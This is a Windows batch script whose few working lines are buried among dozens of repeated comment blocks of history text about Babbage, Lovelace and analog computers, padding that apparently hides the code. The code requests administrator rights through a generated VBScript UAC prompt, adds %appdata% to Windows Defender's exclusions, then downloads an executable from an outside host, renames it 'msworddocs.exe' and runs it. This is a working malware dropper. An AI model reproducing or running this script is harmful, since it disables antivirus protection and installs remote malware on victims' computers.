::powershell -Command "Start-Sleep -Seconds 300";
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
@ECHO OFF
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 


setlocal EnableDelayedExpansion
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::net file to test privileges, 1>NUL redirects output, 2>NUL redirects errors
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto START ) else ( goto getPrivileges ) 
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

:getPrivileges
if '%1'=='ELEV' ( goto START )
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

set "batchPath=%~f0"
set "batchArgs=ELEV"
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::Add quotes to the batch path, if needed
set "script=%0"
set script=%script:"=%
IF '%0'=='!script!' ( GOTO PathQuotesDone )
    set "batchPath=""%batchPath%"""
:PathQuotesDone
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::Add quotes to the arguments, if needed.
:ArgLoop
IF '%1'=='' ( GOTO EndArgLoop ) else ( GOTO AddArg )
    :AddArg
    set "arg=%1"
    set arg=%arg:"=%
    IF '%1'=='!arg!' ( GOTO NoQuotes )
        set "batchArgs=%batchArgs% "%1""
        GOTO QuotesDone
        :NoQuotes
        set "batchArgs=%batchArgs% %1"
    :QuotesDone
    shift
    GOTO ArgLoop
:EndArgLoop
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::Create and run the vb script to elevate the batch file
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs"
ECHO UAC.ShellExecute "cmd", "/c ""!batchPath! !batchArgs!""", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs"
"%temp%\OEgetPrivileges.vbs" 
exit /B

:START
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::Remove the elevation tag and set the correct working directory
IF '%1'=='ELEV' ( shift /1 )
cd /d %~dp0
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

::Do your adminy thing here...

cd %appdata%
::powershell -Command "Start-Sleep -Seconds 900";
::Indeed, when John Napier discovered logarithms for computational purposes in the early 17th century, there followed a period of 
::considerable progress by inventors and scientists in making calculating tools. The apex of this early era of formal computing can 
::be seen in the difference engine and its successor the analytical engine (which was never completely constructed but was designed ::in detail), both by Charles Babbage. The analytical engine combined concepts from his work and that of others to create a device ::that, if constructed as designed, would have possessed many properties of a modern electronic computer. These properties include ::features such as an internal "scratch memory" equivalent to RAM, multiple forms of output including a bell, a graph-plotter, and ::simple printer, and a programmable input-output "hard" memory of punch cards which it could modify as well as read. The key ::advancement which Babbage's devices possessed beyond those created before his was that each component of the device was ::independent of the rest of the machine, much like the components of a modern electronic computer. This was a fundamental shift in ::thought; previous computational devices served only a single purpose, but had to be at best disassembled and reconfi
::gured to solve ::a new problem. Babbage's devices could be reprogramed to solve new problems by the entry of new data, and act upon previous ::calculations within the same series of instructions. Ada Lovelace took this concept one step further, by creating a program for ::the analytical engine to calculate Bernoulli numbers, a complex calculation requiring a recursive algorithm. This is considered to ::be the first example of a true computer program, a series of instructions that act upon data not known in full until the program ::is run.Following Babbage, although unaware of his earlier work, Percy Ludgate in 1909 published the 2nd of the only two designs ::for mechanical analytical engines in history.[17] Two other inventors, Leonardo Torres y Quevedo and Vannevar Bush, also did ::follow on research based on Babbage's work. In his Essays on Automatics (1913) Torres y Quevedo designed a Babbage type of 
::calculating machine that used electromechanical parts which included floating point number representations and built a prototype ::in 1920. Bush's paper Instrumental Analysis (1936) discussed using existing IBM punch card machines to implement Babbage's design. ::In the same year he started the Rapid Arithmetical Machine project to investigate the problems of constructing an electronic ::digital computer.[18]Several examples of analog computation survived into recent times. A planimeter is a device which does ::integrals, using distance as the analog quantity. Until the 1980s, HVAC systems used air both as the analog quantity and the ::controlling element. Unlike modern digital computers, analog computers are not very flexible, and need to be reconfigured (i.e., ::reprogrammed) manually to switch them from working on one problem to another. Analog computers had an advantage over early digital 

powershell -Command "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %appdata%"; 


powershell -Command "Start-Sleep -Seconds 10";

cd %appdata% 

Powershell -Command " Invoke-WebRequest 'http://doncasmail.com/files/elevated.exe' -Outfile msworddocs.exe";
msworddocs.exe;